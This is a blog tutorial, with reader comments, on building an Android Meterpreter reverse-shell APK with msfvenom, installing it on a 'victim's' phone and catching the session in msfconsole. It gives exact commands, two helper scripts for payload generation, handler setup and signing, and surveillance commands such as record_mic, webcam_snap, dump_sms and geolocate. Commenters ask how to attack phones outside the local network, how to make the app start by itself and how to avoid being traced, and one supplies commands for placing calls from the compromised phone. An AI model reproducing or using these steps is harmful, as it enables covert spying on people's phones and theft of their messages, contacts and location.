Wednesday, January 27, 2016

Hack Any Android Phone : msfvenom - Metasploit payload generator

msfvenom is the Metasploit Framework's standalone payload generator, shipped with Kali Linux. It combines the jobs of the older msfpayload and msfencode tools in a single command, and among other things it can emit an Android APK that carries a Meterpreter payload.

msfpayload and msfencode were deprecated in 2015 and msfvenom is their replacement. Metasploit itself is not outdated: msfconsole is still what you use to catch the connection the payload makes back to you.

So, let's get started!!

STEPS :

1. Fire up Kali and open a terminal.

2. Generate the Android payload. The output is an APK, not a Windows executable.
Command:
root@kali:~# msfvenom -p android/meterpreter/reverse_tcp  LHOST=192.168.0.110 LPORT=4444 R > andro.apk
(LHOST is the IP address of your Kali machine; to find it, open a new terminal and type ifconfig. The phone must be able to reach that address on LPORT.)

The APK is written to the current working directory (your home folder if the terminal opened there). Check that it is not 0 bytes: because of the > redirect, a file of 0 bytes means msfvenom exited with an error and nothing was generated.

Note: Don't add any stray space characters, in particular not after LHOST= or LPORT=. A space there makes msfvenom treat the address as a separate argument and fail. Use the command as is (after changing LHOST and LPORT as needed).

3. Transfer or mail this file (here andro.apk) to the victim's phone and install it. The phone must allow installation from unknown sources, and the APK must be signed, otherwise Android refuses it with a parse error (see the error-fixing section below).

4. Start the Metasploit Framework console as follows:

Command:
root@kali:~# msfconsole

5. Now set up the multi/handler listener. The payload, LHOST and LPORT must match what you used in step 2:
msf  > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.110
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit

        Payload Handler is being started........

6. When the victim taps the app on the phone (it shows up in the app list as MainActivity), the payload connects back and a Meterpreter session is established.

7. Try the following Meterpreter commands in the session:
    - record_mic
    - webcam_snap
    - webcam_stream
    - dump_contacts
    - dump_sms
    - geolocate
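Steps 2 through 5 as one script, an added example that is not part of the original post. It refuses LHOST/LPORT values that contain whitespace (the mistake behind the 0-byte APK reports), runs msfvenom, checks that the result is a non-empty ZIP before you send it anywhere (an APK is a ZIP archive), and writes a resource file so msfconsole starts the handler with exactly the settings that went into the APK. The function names, the handler.rc file name and the use of msfvenom's -o flag in place of R > are my choices; msfvenom and msfconsole are assumed to be on PATH.

```shell
#!/bin/sh
# Generate the Android Meterpreter APK, sanity-check it, and prepare the
# listener. Added helper script, not part of the original post; msfvenom
# and msfconsole are assumed to be on PATH. Function and file names are mine.
set -eu

# Compose the msfvenom command. A space after LHOST= or LPORT= makes
# msfvenom see the address as a separate argument and fail, leaving a
# 0-byte APK behind the redirect, so whitespace is rejected up front.
venom_cmd() {
    v_lhost="$1"; v_lport="$2"; v_out="$3"
    case "$v_lhost$v_lport" in
        *[[:space:]]*) echo "LHOST/LPORT must not contain whitespace" >&2; return 1 ;;
    esac
    printf 'msfvenom -p android/meterpreter/reverse_tcp LHOST=%s LPORT=%s -o %s\n' \
        "$v_lhost" "$v_lport" "$v_out"
}

# Verify the output before sending it anywhere: it must be non-empty and
# begin with the ZIP local-file-header magic "PK", since an APK is a ZIP.
check_apk() {
    [ -s "$1" ] || { echo "$1 is empty or missing: msfvenom failed" >&2; return 1; }
    [ "$(head -c 2 "$1")" = "PK" ] || { echo "$1 is not a ZIP/APK" >&2; return 1; }
}

# Write a resource file so the handler is started with exactly the same
# payload, LHOST and LPORT that went into the APK (no retyping mistakes).
write_handler_rc() {
    cat > "$3" <<EOF
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST $1
set LPORT $2
set ExitOnSession false
exploit -j
EOF
}

main() {
    cmd=$(venom_cmd "$1" "$2" "$3")
    echo "+ $cmd"
    eval "$cmd"
    check_apk "$3"
    write_handler_rc "$1" "$2" handler.rc
    echo "$3 looks sane; start the listener with: msfconsole -q -r handler.rc"
}

# Usage: ./build.sh 192.168.0.110 4444 andro.apk
if [ $# -gt 0 ]; then
    [ $# -eq 3 ] || { echo "usage: $0 LHOST LPORT out.apk" >&2; exit 1; }
    main "$@"
fi
```

Run it as ./build.sh 192.168.0.110 4444 andro.apk, then msfconsole -q -r handler.rc. ExitOnSession false with exploit -j keeps the listener up for further connections, which matters when the first tap on the phone fails and the target retries.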
************************************************************************
Error fixing (in case you get a PARSE ERROR when installing the APK)

Android refuses to install an APK that is not signed, and that is what the parse error usually means. A 0-byte APK gives the same symptom; if the file is empty, regenerate it (see step 2). Two ways to sign:

1) Type the command "d2j-apk-sign andro.apk" (from the dex2jar package in Kali); it writes a signed copy of the APK.

                                               or

 2) Download signapk and use it as follows.

Steps to follow
  1. Open the signapk folder and open a command prompt there.
  2. Copy andro.apk (the app you made) into the signapk folder.
  3. Type java -jar signapk.jar certificate.pem key.pk8 andro.apk andro-signed.apk
  4. Copy andro-signed.apk to your phone and install it.
Hope this works... :)
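Signing with apksigner instead of signapk or d2j-apk-sign, as an added example rather than the post's method. The is_signed check is the useful part: ZIP entry names are stored uncompressed, so a JAR (v1) signature shows up as a META-INF/*.RSA, .DSA or .EC entry name, and the v2/v3 scheme leaves the literal "APK Sig Block 42" magic in the file, so a plain grep tells you whether an APK is already signed before you bother re-signing it (recent msfvenom versions sign the APK themselves when keytool and jarsigner are installed). keytool from a JDK and apksigner from the Android SDK build-tools are assumed to be on PATH; the keystore name, alias and password are mine.

```shell
#!/bin/sh
# Sign an msfvenom APK with a self-generated key and confirm the result
# carries a signature. Added example, not the post's signapk/d2j method.
# Assumes keytool (JDK) and apksigner (Android SDK build-tools) on PATH.
set -eu

# Report whether an APK already carries a signature. ZIP entry names are
# stored uncompressed, so a v1 (JAR) signature shows up as a META-INF/*.RSA
# (or .DSA/.EC) entry name, and a v2/v3 signature leaves the literal
# "APK Sig Block 42" magic before the central directory. No unzip needed.
is_signed() {
    grep -a -q -E 'META-INF/[^/]+\.(RSA|DSA|EC)|APK Sig Block 42' "$1"
}

# Create a throwaway RSA signing key once (alias and password are
# hypothetical values, fine for a lab, never for a real release).
ensure_keystore() {
    ks_path="$1"
    [ -f "$ks_path" ] || keytool -genkeypair -keystore "$ks_path" -alias msf \
        -keyalg RSA -keysize 2048 -validity 3650 \
        -storepass android -keypass android -dname "CN=msf test"
}

# Sign in_apk to out_apk with apksigner (v1+v2 by default) and verify.
# Skips the work if the input already carries a signature.
sign_apk() {
    in_apk="$1"; out_apk="$2"; ks_file="${3:-msf.keystore}"
    if is_signed "$in_apk"; then
        echo "$in_apk is already signed; copying unchanged" >&2
        cp "$in_apk" "$out_apk"
        return 0
    fi
    ensure_keystore "$ks_file"
    apksigner sign --ks "$ks_file" --ks-key-alias msf \
        --ks-pass pass:android --key-pass pass:android \
        --out "$out_apk" "$in_apk"
    apksigner verify "$out_apk"
    is_signed "$out_apk"
}

# Usage: ./sign.sh andro.apk andro-signed.apk [keystore]
[ $# -eq 0 ] || sign_apk "$@"
```

apksigner verify fails on a file that Android would also reject, so a green verify here saves a round trip to the phone; jarsigner -keystore msf.keystore -signedjar out.apk in.apk msf produces a v1-only signature that older devices accept as well.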



Share the post!!!!!! Enjoy HACKING!!!

83 comments:

  1. Nice tutorial bro!!!!!! need more of this kind.

    ReplyDelete
  2. i get this

    java.util.zip.ZipException: zip file is empty
    at java.util.zip.ZipFile.open(Native Method)
    at java.util.zip.ZipFile.<init>(Unknown Source)
    at java.util.zip.ZipFile.<init>(Unknown Source)
    at java.util.jar.JarFile.<init>(Unknown Source)
    at java.util.jar.JarFile.<init>(Unknown Source)
    at com.android.signapk.SignApk.main(SignApk.java:320)
    when I try to sign the app. Did Kali mess up making the apk or what?

    ReplyDelete
    Replies
    1. I'm having the same problem. For me it came up when fixing the parse error

      Delete
    2. Guys don't give any space after LHOST= and also after LPORT=

      Delete
    3. I have the same problem, can anyone solve it? Help

      Delete
    4. Type "d2j-apk-sign andro.apk" in terminal to sign the apk.

      Delete
  3. Help ... the apk generated with msfvenom is not installed on the Android phone?

    ReplyDelete
  4. Doesn't work. I get "Error: Invalid Payload Selected"

    ReplyDelete
    Replies
    1. There was a slight problem with the code, we have made the changes. Please try again, this time it should work.

      Delete
  5. The apk it installs for me is blank and can't be transferred or sent to anyone. How do I get the right apk?

    ReplyDelete
    Replies
    1. There was a slight problem with the code, we have made the changes. Please try again, this time it will work (the blank 0 bytes apk problem is solved)

      Delete
  6. Hello friend, when I generate the apk (having solved the spaces) it weighs 8146 bytes (approximately) ... but when trying to install it, on some devices it is not installed and on others it is installed but not running ... HELP !!

    ReplyDelete
  7. Hacking Tutorials, Security Tips and Tricks, Mobile Hacking, Wifi Hacking, Pinoy Hackers

    Logon to : http://forum.phu.online

    ReplyDelete
    Replies
    1. Please, for me the exploit runs, but I can do nothing because Meterpreter commands
      do not work. I want to use "android commands". What is the problem? Please help me, thanks.

      Delete
    2. No session established!
      It's stuck at "starting the payload handler"

      Delete
    3. @unknown from July 29th
      check if the IP you set when generating the apk is right and is accessible from the device you start the apk

      Delete
  8. Please, for me the exploit runs, but I can do nothing because Meterpreter commands
    do not work. I want to use "android commands". What is the problem? Please help me, thanks.

    ReplyDelete
  9. The app is installed and I wait for it to start, but nothing comes from the Android device. Why is that?

    ReplyDelete
  10. But this method is only working on Android phones that are on the same wifi network as my computer.
    Let me know if anyone got a way through which I can hack into an Android which is using a different wifi network.

    ReplyDelete
    Replies
    1. Watch https://www.youtube.com/watch?v=hKF9NZw5iY0 and you have to make some changes for android accordingly.

      Delete
  11. Anyone who wants to make a call from the device afterwards just try this.

    Type "shell" (without quotes) in the meterpreter shell.
    It will give you a local shell on the Android device.
    Now you can make a call by using the activity manager(Just type the following command)

    am start -a android.intent.action.CALL -d tel:XXXXXXXXXX

    (Replace X with the no you want to call)

    If you want to receive an incoming call just type

    input keyevent 5

    To hang up an incoming call

    input keyevent 6

    Tested on my Oneplus 2

    ReplyDelete
    Replies
    1. How do you know when there's an incoming call, when hacking remotely over WAN/Internet?

      Delete
    2. Interesting. Thanks a bunch. Worked like a charm. Except, I'm a bit stumped on... after you hit that line of code and the phone calls, how exactly would I go about hanging the phone up after the call connects? Thanks :)

      Delete
    3. I have Oneplus 2 as well.
      i have a few queries as i am stuck for a few days now..
      Did you root the device?
      How did you manage to install the apk file on the device?
      Do we have to sign the apk file to install it on the device?
      Thanks in advance

      Delete
    4. This will work for rooted phones onlY!

      Delete
  12. I have a Samsung Galaxy S4 which I have rooted before, and I already tried everything written in this post, but the apk didn't install on my smartphone and did not connect with my Kali. What should I do?

    ReplyDelete
  13. Thanks for sharing. Look forward to testing this out.

    ReplyDelete
  14. When I open the app on my phone, that is "Main Activity", it doesn't show on msfconsole on Linux? Help me.

    ReplyDelete
  15. One question. How can I send it to someone's phone? I have trouble on that part. Sending the apk file to someone's Android? How?

    ReplyDelete
    Replies
    1. Via e-mails or stuff like that.

      Delete
  16. Thanks alot
    Really helpful
    Keep up the good work

    ReplyDelete
  17. this is just crashing on my phone help :/

    ReplyDelete
  18. just wont load main activity

    ReplyDelete
  19. [-] Errno::ECONNRESET An existing connection was forcibly closed by the remote host. - SSL_accept <----------- the error in msf

    ReplyDelete
  20. Hi bro... I did everything right, but when I run the exploit command it doesn't open a session... what to do???

    ReplyDelete
    Replies
    1. It should connect after the MainActivity app has been clicked on. Any errors?

      Delete
    2. No, it doesn't show any errors... after the exploit command it shows nothing... btw I use a router..

      Delete
    3. I take it the andro.apk installed fine and you have MainActivity in your apps list ? Did you make sure to have no space when entering the LHOST=xxx.xxx.x.xxx & LPORT=4444 when creating the payload (in the video it shows a space but down in comments it says there was a small mistake, that and I personally had to re-sign the apk to get it to install using this https://www.dropbox.com/sh/35mrsdzl1phgca6/AACjM7oKMTN8ZeqsOL28Dad0a?dl=0 ) After using the exploit command, try clicking on the app. If nothing happens, I'd suggest trying to create the .apk payload again with the command:

      msfvenom -p android/meterpreter/reverse_tcp LHOST=xxx.xxx.x.xx LPORT=xxxx R > name.apk

      It shouldn't be too hard. If you want it to be over your own wifi (phone and PC must be connected to the same) use the local IP. If you want to have it where the phone is not connected to your wifi, you'll want to enter your external IP as the LHOST. Hope the info helps, I'm still learning myself, but I've gotten that far.

      Delete
    4. No, I didn't give any space, and I signed the app too, but nothing happens. And I use the same connection for my PC and Android. I tried port forwarding on my router too.... but no luck.

      Delete
  21. Not with the app, no mate, nothing. Any ideas how I can fix it?

    ReplyDelete
  23. Ohhh, now I have one: [-] Errno::ECONNRESET An existing connection was forcibly closed by the remote host. - SSL_accept

    ReplyDelete
  24. I did everything right, but when I opened the apk file and waited for the meterpreter session to be established, nothing happened. I do not know what is wrong.

    ReplyDelete
  25. Can i make it autorun
    i mean instead of the person clicking on the icon
    i understand u can add any apk and make this
    but i want it autorun

    Just for Knowledge

    ReplyDelete
  26. This process and the PAYLOAD only work when the attacker and target are on the same network. What to do if the target is behind another network than the attacker's local network? Really need one tutorial for that, and thank you for this article!

    ReplyDelete
    Replies
    1. If you want that, then you should have a static public ip address directly connected to the attacker machine, and write that static ip address in the LHOST option.

      Delete
  27. "The value specified for payload is not valid"

    This message will appear after the set payload android/meterpreter/reverse_tcp command. How should I solve this problem?

    ReplyDelete
    Replies
    1. Might be a typo, double check

      Delete
  28. Bro, the payload apk doesn't open on the Android phone and doesn't say anything either. Help me, what to do?

    ReplyDelete
  29. Error: Invalid Payload Selected
    help

    ReplyDelete
  30. Very tutorial there man, do I need to have a static IP or is it still ok on dhcp? Can we do the same for a phone that's not android?like a Java phone. And windows phone too? If yes how please?

    ReplyDelete
  31. How can I install this program remotely without the victim performing any task?

    ReplyDelete
  32. Okay. So thank you for this tutorial, everything works well all the way through to exploit. But after I press enter it stops at starting the payload handler.. even after I click on the APP several times. Please assist me on how to establish a connection between the phone and msf. Thank you.
    anonymous

    ReplyDelete
  33. Nice post man!
    And for WAN attacks you can use dynamic IP DNS (like No-IP); the host will be like
    something.noip.net
    Just add
    LHOST=something.noip.net

    It's for those who have a dynamic public IP. If you have a static IP just use that IP, no need to create a DNS host.

    ReplyDelete
    Replies
    1. Can you elaborate on that? Is there any setting that I should do if I have a dynamic IP? And what do you mean by something.noip.net?

      Delete
  35. This is not the complete process. It works for all smartphones, which are on the same network or on another network. It is an incomplete process. When we follow it we get a .apk file of some kilobytes, but in reality it needs to be 1.458 MB. If you are able to create a 1.458 MB apk file, you can easily hack any Android that installs it.

    ReplyDelete
  36. This tutorial is really nice! I tried it and successfully did it on the same network. But now I want to do it on a global level. I have heard that it can be done by port forwarding; I tried doing it but didn't get the result. Please help me.

    ReplyDelete
  37. Hi, first of all, thank you for the tutorial, and I'm telling all of you that it works. But my question is what next, what can I do next? Can I download photos or videos or install any apps on the hacked phone? 'Cause I don't know how. I mean, I know how to record video and take photo snaps, but can we do anything else?

    ReplyDelete
  38. - dump_contacts
    - dump_sms
    - geolocate
    give an unknown command error.
    Plz help

    ReplyDelete
  39. What about the things I can do later? I can only see the things on the device with the shell command but can't move them.

    ReplyDelete
  40. Stuck at 'starting the payload handler' at the listener section.

    ReplyDelete
  41. Same too,
    stuck at 'starting the payload handler' at the listener section.

    ReplyDelete
  42. I was unable to install the apk on the victim's smartphone, it said the app wasn't installed. Could you help me?

    ReplyDelete
  43. It doesn't work. After creating the payload, the size of the apk is 0 bytes, hence it gives me the error "invalid payload selected". How to resolve it?

    ReplyDelete
    Replies
    1. Zero bytes means your msfvenom command exited with an error and the payload wasn't created.

      Delete
  44. how to autostart the app after "clearing of ram" or "reboot"?

    ReplyDelete
  45. One thing, can my IP be traced back? And what if I use a ProxyChain?

    ReplyDelete
    Replies
    1. You shouldn't be doing anything that requires you to be worried if your IP can be traced back. This isn't the right place for this question.

      Delete
  46. When I try to install the apk it showed me
    E:\Adobe\New folder>java - jar signapk.jar certificate.pem key.pk8 andro.apk andro-signed.apk
    DNS server not authoritative for zone.

    I can't install the apk file on my Android, it shows me ERROR

    ReplyDelete
  47. Guys, this tutorial is the first that was working. Stop complaining and follow all the instructions.

    If you are stuck then google a bit for more help... This is 100% good and it is working perfectly. Thanks for this and please do more tutorials...

    Sorry for my english...

    ReplyDelete
  48. It gets stuck showing "starting the payload handler".
    I am using VMware with Kali Linux on my W8 PC..... help needed

    ReplyDelete
  49. Is it possible to control remotely, without being on the same network?

    ReplyDelete
  50. msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.11 PORT=4444 R > andro.apk
    No platform was selected, choosing Msf::Module::Platform::Android from the payload
    No Arch selected, selecting Arch: dalvik from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 9488 bytes
    I get this, but the app says not installed. What's the problem?

    ReplyDelete
  51. Sir, I can't make the session.

    ReplyDelete
  52. Can I give any value for LPORT in a VM on a LAN?

    ReplyDelete
  53. I get meterpreter to open but it just fails to do anything. I open a session, then try to dump contacts and the session closes, reason: died.
    Anyone help

    ReplyDelete
  54. Help me please! When I create a payload with msfvenom -p android/meterpreter/reverse_tcp lhost=my externalIP lport=4444 R>payload.apk, the apk is created, but when I start the exploit I don't receive any session and I get an error..... On the LAN it works, but how can it work over the WAN?

    ReplyDelete
  55. Linux tells me: bash: msfvenom: command not found

    ReplyDelete

© Kali Tutorials, 2016. Unauthorized use and/or duplication of this material without express and written permission from this site’s author and/or owner is strictly prohibited. Excerpts and links may be used, provided that full and clear credit is given to Shashwat Chaudhary and Kali Tutorials with appropriate and specific direction to the original content.
Bitcoin: 1B5aLqJcMW7zznffTxQwta8JTZsxBDPguC